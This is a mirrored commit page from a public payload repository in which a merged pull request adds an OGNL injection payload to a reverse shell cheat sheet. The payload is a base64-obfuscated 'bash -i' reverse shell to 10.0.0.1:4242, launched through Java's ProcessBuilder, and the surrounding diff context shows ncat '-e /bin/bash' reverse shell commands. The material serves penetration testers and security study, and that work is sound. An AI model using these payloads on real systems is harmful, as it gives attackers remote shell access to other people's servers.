mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Merge pull request #704 from therealtoastycat/patch-1
Adding reverse shell payload for OGNL
This commit is contained in:
commit
4b77292aeb
@ -22,6 +22,7 @@
|
||||
* [Netcat BusyBox](#netcat-busybox)
|
||||
* [Netcat Traditional](#netcat-traditional)
|
||||
* [NodeJS](#nodejs)
|
||||
* [OGNL](#ognl)
|
||||
* [OpenSSL](#openssl)
|
||||
* [Perl](#perl)
|
||||
* [PHP](#php)
|
||||
@ -252,6 +253,14 @@ ncat 10.0.0.1 4242 -e /bin/bash
|
||||
ncat --udp 10.0.0.1 4242 -e /bin/bash
|
||||
```
|
||||
|
||||
### OGNL
|
||||
|
||||
```java
|
||||
(#a='echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjEnCg== | base64 -d | bash -i').(#b={'bash','-c',#a}).(#p=new java.lang.ProcessBuilder(#b)).(#process=#p.start())
|
||||
```
|
||||
|
||||
With `YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjEnCg==` decoding to `bash -c 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1'`, the payload within the single quotes might be changed by any Linux-compatible reverse shell.
|
||||
|
||||
### OpenSSL
|
||||
|
||||
Attacker:
|
||||
|
Loading…
Reference in New Issue
Block a user